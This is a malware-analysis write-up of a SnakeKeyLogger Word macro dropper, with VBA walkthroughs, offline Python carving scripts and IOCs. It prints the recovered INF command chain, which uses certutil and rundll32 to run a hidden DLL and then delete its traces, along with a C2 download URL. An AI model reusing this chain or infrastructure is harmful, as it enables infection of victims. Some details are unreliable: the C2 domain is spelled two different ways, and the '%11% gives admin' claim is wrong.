Dissecting SnakeKeyLogger Macros


Introduction

This post discusses how SnakeKeyLogger uses Advpack.dll to drop and execute its main payload.

Snake Keylogger slithers past traditional defenses using social engineering and technical trickery. This post delves into the specifics of its phishing email tactics and malicious macro exploitation, providing valuable insights for security professionals and tech-savvy users to bolster their defenses against this evolving threat.

About The specimen

The sample we have today is a .doc file.

hash: 8af7f091c0c869006be53ef947b10ee18ddf6a2c2870a9b163484a372f94b90a

VBA Existence

The first thing to check with Office files is whether they contain macros, which the TA uses to run VBA code that acts as the dropping or downloading stage. Checking the file with oleid, we got a result showing that it does contain macros.

Macros can be analyzed in many ways, but I prefer the Office VBA IDE, which has capabilities such as viewing all objects and debugging the code itself; this helps more than manual deobfuscation.

Doc File Analysis

The file has only one page, containing an image that tells the user there is an issue loading the original page and asks them to enable macros and also to check the disk space in order to view the decoy page. That page does not exist, by the way; no macro displays any other page at all.

Macros Analysis

It first checks the VBA version and, based on it, whether the victim's system is x86 or x64, declaring a specific function accordingly. Overall, it declares a function called tAcKs(), defined as LaunchINFSectionW from Advpack.dll; according to MSDN, this function is used to launch a portion of an Information (INF) file.

And here is the declaration of LaunchINFSection:

int WINAPI LaunchINFSection(  
   HWND      hwndOwner,  
   HINSTANCE hInstance,  
   PSTR      pszParams,  
   INT       nShow  
);

Snake uses this method to run the INF file under a legitimate container or process. According to the LOLBAS project, the technique is used to bypass AWL (Application Whitelisting): "Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified)."

AutoOpen() function

There is only one call inside the AutoOpen() function, which is the first thing executed when macros are enabled; you can call it the entry point or the main of the document's macros. It calls a function named PsfmA(), which only contains two further calls, WHTLE() and tAcKs(). Remember that tAcKs is the pointer to the LaunchINFSectionW API call from Advpack.dll.

If you notice, there is an argument FlkMT passed to the WHTLE() function; I will explain it later. For now, let's explore the WHTLE() function.

WHTLE() Function

This function takes 2 arguments and, at first glance, handles file-writing operations, so the file it writes may contain the payload or any other command to be executed. If you look back at the PsfmA() function, you can see that tAcKs() takes the same file that is passed to WHTLE as its argument.

Static Function WHTLE(iMwDk, dOPaA)
    ' iMwDk: destination file path (the INF dropped in %TEMP%)
    ' dOPaA: array of decimal byte values that make up the file content
    Dim wmEjI, xgxIS
    wmEjI = FreeFile
    Open iMwDk For Binary Access Read Write As #wmEjI
    For xgxIS = LBound(dOPaA) To UBound(dOPaA)
        Put #wmEjI, , CByte(dOPaA(xgxIS))   ' write one byte per array element
    Next
    Close #wmEjI
End Function

As you can see, it opens a handle to iMwDk, the file path passed to WHTLE, then uses the size of dOPaA as the last index of the write loop (each element is written with the Put keyword), and it uses CByte() to convert each element into the Byte data type.

So now we need to check what the dOPaA argument is. As we saw before, it is referred to as FlkMT, and this argument is a function call, so FlkMT is responsible for building the payload that is written to the TEMP directory by the WHTLE function.

FlkMT() function → Payload builder

Inside this function, it assigns to FlkMTT the value of jAplA, a function call that returns an array of decimal values. After that assignment it executes many calls to a function named rFdPB(), which takes two arguments: the first is FlkMT and the second varies for every call, being another function that returns a bunch of bytes in the same way as jAplA.

Here is the implementation of rFdPB(), which is called many, many times:

This VBA macro defines a function named rFdPB that concatenates two arrays, dkbDR and quELr, and stores the result in dkbDR. It uses the static variables ioQHr and QDLuE to keep track of the array index and size. The function first determines the size of dkbDR and then resizes it to accommodate the combined size of both arrays. Finally, it loops through each element of quELr and appends it to dkbDR. The "Next: End Function" at the end seems to be a mistake, as it would create a syntax error; it should be removed.

And here is the deobfuscated version of this function, in case you found it hard to follow:

Function Copy_to_1st_array(ByRef payload As Variant, ByRef array_to_copy As Variant)
    Static index As Long
    Static payload_length As Long
    ' current element count of payload (the arrays are 0-based)
    payload_length = UBound(payload) + 1
    ' grow payload so it can hold both arrays, keeping the existing contents
    ReDim Preserve payload(payload_length + UBound(array_to_copy))
    For index = LBound(array_to_copy) To UBound(array_to_copy)
        payload(payload_length + index) = array_to_copy(index)
    Next
End Function

So, in brief, this function appends chunk after chunk and builds the payload of the INF file.
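To reproduce what FlkMT does without running the macro, here is an added Python example (not the post's or the malware's code) that pulls every VBA Array() literal out of a macro source string in source order and appends them exactly as rFdPB / Copy_to_1st_array does. The three-chunk macro snippet and the helper names kQwZe and pLmNb are constructed for the example; the real sample returns each chunk from its own function.

```python
import re

# Constructed stand-in for the macro source. The real sample returns each chunk
# from a separate helper (jAplA and friends); here three chunks are embedded
# inline as VBA Array() literals holding decimal byte values.
SAMPLE_VBA = """
Function jAplA()
    jAplA = Array(91, 86, 69, 114, 115, 105, 79, 78, 93, 13, 10)
End Function
Function kQwZe()
    kQwZe = Array(32, 83, 73, 103, 78, 65, 116, 117, 82, 101, 32, 61, 32)
End Function
Function pLmNb()
    pLmNb = Array(36, 67, 104, 105, 99, 97, 103, 111, 36, 13, 10)
End Function
"""

ARRAY_RE = re.compile(r"Array\(([\d\s,]+)\)")

def chunks_from_vba(src: str) -> list[list[int]]:
    """Return every Array(...) literal as a list of byte values, in source order."""
    chunks = []
    for m in ARRAY_RE.finditer(src):
        vals = [int(v) for v in m.group(1).split(",") if v.strip()]
        if any(not 0 <= v <= 255 for v in vals):
            raise ValueError("value outside byte range: not a byte array")
        chunks.append(vals)
    return chunks

def append_chunk(payload: list[int], chunk: list[int]) -> list[int]:
    """Python equivalent of rFdPB / Copy_to_1st_array: grow payload, copy chunk after it."""
    payload_length = len(payload)          # UBound(payload) + 1
    payload.extend([0] * len(chunk))       # ReDim Preserve
    for i, b in enumerate(chunk):
        payload[payload_length + i] = b
    return payload

def rebuild_payload(src: str) -> bytes:
    """Emulate FlkMT: start from the first chunk and append every later one in order."""
    payload: list[int] = []
    for chunk in chunks_from_vba(src):
        append_chunk(payload, chunk)
    return bytes(payload)   # what WHTLE would Put() into the INF in %TEMP%

if __name__ == "__main__":
    print(rebuild_payload(SAMPLE_VBA).decode("latin-1"))
```

Running it on the constructed snippet prints the first two lines of the INF header shown in the next section.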

Executed Command line

I have tried to build the first 5 calls and I got a significant result:

[VErsiON]
 SIgNAtuRe = $Chicago$
 aDVANcEDInf = 2.5
 [deFAULTInSTALL_sInGLEUSeR]
 rUnPostSETUPcommAnDS = werd
 [werd]
 %11%\cMd.exe /C morE /E +29 %TEmP%\VN.inf > %TEmP%\cvr.tmp
 && CERTUtIL -DEcoDEHex %TEmP%\cvr.tmp %TEmP%\xhd.jpg
 && ruNDLl32 %TEmP%\xhd.jpg,main && del %TEmP%\cvr.tmp
 && dEL %TEmP%\xhd.jpg && del %TEmP%\VN.inf
 [Strings]
 servICEName = ">"
 SHoRtsvCnaME = "<"
4D5A>

Many flags have been triggered at this point: the full command line looks malicious, and the 4D5A, which is the MZ signature, indicates an embedded PE payload. So I put a breakpoint on the call to the tAcKs function, which is the declaration of LaunchINFSectionW.

So what is meant by INF files?

INF file:

An INF file, short for information file, is a plain text file used by Microsoft Windows operating systems for the installation of software and drivers. They are essential components in the Windows Setup API, providing the instructions and information needed to properly install and configure devices and software.

So let's check the INF file dropped in the Temp directory and try to simulate the command found above to understand what is going on.

Let's break down the executed command:

%11%\cMd.exe /C morE /E +29 %TEmP%\VN.inf > %TEmP%\cvr.tmp  
 && CERTUtIL -DEcoDEHex %TEmP%\cvr.tmp %TEmP%\xhd.jpg  
 && ruNDLl32 %TEmP%\xhd.jpg,main && del %TEmP%\cvr.tmp  
 && dEL %TEmP%\xhd.jpg && del %TEmP%\VN.inf

%11%\cMd.exe

%11% refers to the system32 path, used to run cmd.exe with admin permission.

morE /E +29 %TEmP%\VN.inf > %TEmP%\cvr.tmp

This command saves the content of VN.inf, starting from the end of line 29 until the end of the file, into cvr.tmp.

CERTUtIL -DEcoDEHex %TEmP%\cvr.tmp %TEmP%\xhd.jpg

This command uses the hex-decoding feature of certutil, a command-line program installed as part of Certificate Services, and saves the result to the xhd.jpg file, which will contain the main payload.

ruNDLl32 %TEmP%\xhd.jpg,main

Here the TA uses rundll32, which is used to run a DLL, to execute xhd.jpg; the export function here is main, which rundll32 will call.

del %TEmP%\cvr.tmp && dEL %TEmP%\xhd.jpg && del %TEmP%\VN.inf

Then it erases its traces, since the payload has already been executed, by deleting the 3 dropped files (VN.inf, cvr.tmp, and xhd.jpg).
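As an added example (not from the original post), this Python script reproduces the first two stages of that command offline, so the DLL can be carved from the dropped INF without executing anything: it skips the first 29 lines the way the post reads the more +29 switch, hex-decodes the remainder as certutil -decodehex would for plain hex, and checks for the MZ magic. The INF text and the 64-byte fake DOS header are constructed; real certutil also accepts other hex-dump layouts, which this stand-in does not handle.

```python
import re

# Constructed INF: 29 lines of directives (padded with blank lines), followed by
# the hex-encoded payload. The real sample carries a full DLL there; this
# stand-in is just a 64-byte DOS header that starts with the MZ magic.
HEADER_LINES = [
    "[Version]", "Signature=$Chicago$", "AdvancedInf=2.5",
    "[DefaultInstall_SingleUser]", "RunPostSetupCommands=werd",
    "[werd]", r"%11%\cmd.exe /C more /E +29 %TEMP%\VN.inf > %TEMP%\cvr.tmp",
    "[Strings]", 'ServiceName=">"',
]
HEADER_LINES += [""] * (29 - len(HEADER_LINES))
FAKE_PE_HEX = ("4D5A90000300000004000000FFFF0000"
               "B8000000000000004000000000000000" + "00" * 32)
SAMPLE_INF = "\r\n".join(HEADER_LINES + [FAKE_PE_HEX]) + "\r\n"

def more_skip(text: str, n: int = 29) -> str:
    """Emulate `more +n` as the post reads it: drop the first n lines, keep the rest."""
    return "".join(text.splitlines(keepends=True)[n:])

def certutil_decodehex(text: str) -> bytes:
    """Emulate `certutil -decodehex` on plain hex: strip whitespace, decode byte pairs."""
    hexdata = re.sub(r"\s+", "", text)
    if len(hexdata) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hexdata):
        raise ValueError("tail of INF is not plain hex")
    return bytes.fromhex(hexdata)

def carve_payload(inf_text: str, skip: int = 29) -> bytes:
    """Run both stages offline and verify the result is a PE (MZ magic)."""
    blob = certutil_decodehex(more_skip(inf_text, skip))
    if blob[:2] != b"MZ":
        raise ValueError("decoded blob does not start with MZ")
    return blob

if __name__ == "__main__":
    pe = carve_payload(SAMPLE_INF)
    print(f"carved {len(pe)} bytes, e_magic={pe[:2]!r}")
```

On a real dropped VN.inf, pass the file contents to carve_payload and hash the returned bytes instead of letting rundll32 load them.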

Main payload analysis

The dropped file is a 32-bit DLL, and while exploring its strings I found some interesting ones that identify this payload as a downloader.

So we need to locate the C2 that will be used to download the next stage.

Dropped File Analysis

The dropped file is a 32-bit DLL and it uses some misleading techniques, such as embedding strings within the .text section, which makes disassembly hard and requires some manual work to fix offsets and code lines.

As I said before, the most important thing in this phase is to identify the C2, and here we are.

And here is the request and the C2: vybsnf3p.sa.com /fdsfh.exe

Unfortunately, I found that the C2 is down and the downloaded file is just the server's Error 404 response; whatever the downloaded file is, though, it will be passed to the WinExec API call.

Tracing the domain in some public repos, I found that it belongs to the SnakeKeylogger stealer and serves many other files, such as the med.bat script, but as I said, the C2 is currently down.

And here is the downloaded response which, had the C2 been up, would have been the next-stage payload.

IOCs

File IOCs:
  doc file         : 8af7f091c0c869006be53ef947b10ee18ddf6a2c2870a9b163484a372f94b90a
  dropped INF file : EE497723EA8F25B3732829DB0AA09F0502607505E816E8D9997F070C4222C98C
  dropped DLL      : B1305F33FD9B834FE7A926F1253BB1E97FF4DDD669C8051FEBA989F819CD667A

Dropping path : %TEMP%

weidr.com

C2:
  vybsnf3.sa.com/fdsfh.exe
